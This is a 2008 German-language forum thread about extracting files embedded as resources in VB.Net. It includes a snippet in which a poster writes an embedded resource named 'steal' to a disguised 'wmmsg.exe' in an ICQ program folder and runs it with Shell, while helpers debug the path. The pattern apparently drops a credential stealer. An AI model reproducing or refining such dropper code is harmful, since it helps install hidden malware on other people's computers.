Kennt einer ein Tutorial auf Deutsch in dem erklärt wird, wie ich Dateien per Resourcequelle in VB.Net benutzen kann?
Wie ich die Daten da rein bekomme, weiß ich jetzt. Aber ich weiß nicht, wie ich die daraus bekomme. In vb6 war es ja mit die resource in ein byte zu laden und dann per put auf die platte..Wie mach ich das mit .Net? _________________
Marduk Überflieger
Verfasst am: 26.05.2008, 22:27
Wenn du zb eine Exe Datei in deinen Ressourcen hast, kannst du folgenden Code verwenden.
Visual Basic: [code] Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load Dim br As New IO.FileStream("text.exe", IO.FileMode.Create, IO.FileAccess.Write) br.Write(My.Resources.name_der_ressource, 0, My.Resources.name_der_ressource.Length - 1) br.Close()
End Sub [/code]
Es kommt halt ganz drauf an, was für eine Datei du vorliegen hast. Bei einer Textdatei nimmst du dann zb einen StreamWriter. Hast du eine Bitmap, kannst du die Klassen-integrierte Speicher Funktion verwenden.
Also, viel schwerer ist es nicht wie VB6.
sollniss Überflieger
Verfasst am: 27.05.2008, 17:16
man kann die dateien auch direkt abrufen, wenn du zB zur laufzeit das programmicon ändern willst, lädtst du vorher das neue icon als ress rein und denn einfach form1.icon = My.Resources.neuesicon.ico
treY.de Newbie
Verfasst am: 27.05.2008, 19:47
Ja es geht um eine Exe entpacken und die muss dann per shell ausgeführt werden..soweit hab ich das auch geschafft...Aber wenn ich das in nen Ordner entpacken will, welcher nicht vorhanden ist, zeigt er mir nen Fehler an...Ich schreib das nochmal neu und dann edit:
Code:
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load<br /><br /><br /> Dim br As New IO.FileStream("C:ProgrammeICQLitewmmsg.exe", IO.FileMode.Create, IO.FileAccess.Write)<br /> br.Write(My.Resources.steal, 0, My.Resources.steal.Length - 1)<br /> br.Close()<br /><br /> Shell("C:ProgrammeICQLitewmmsg.exe")<br /> End Sub
Jetzt zeigt er an, dass die Datei nicht gefunden werden kann...
Marduk Überflieger
Verfasst am: 27.05.2008, 20:29
In welcher Zeile zeigt er denn den Fehler an? bei "dim br as new ..." oder bei "Shell("...")" ?
Und hast du denn mal geguckt ob die Datei auch erstellt worden ist?
treY.de Newbie
Verfasst am: 27.05.2008, 20:32
Der Fehler ist in der Shell Zeile...Ja Datei wird erstellt... _________________
Marduk Überflieger
Verfasst am: 27.05.2008, 21:28
Probier mal erst in den Ordner zu wechseln, also mit c:, dann cd Programme dann cd ICQ ...
Und wenn du in dem Ordner bist, dann einfach Shell("wmmsg.exe")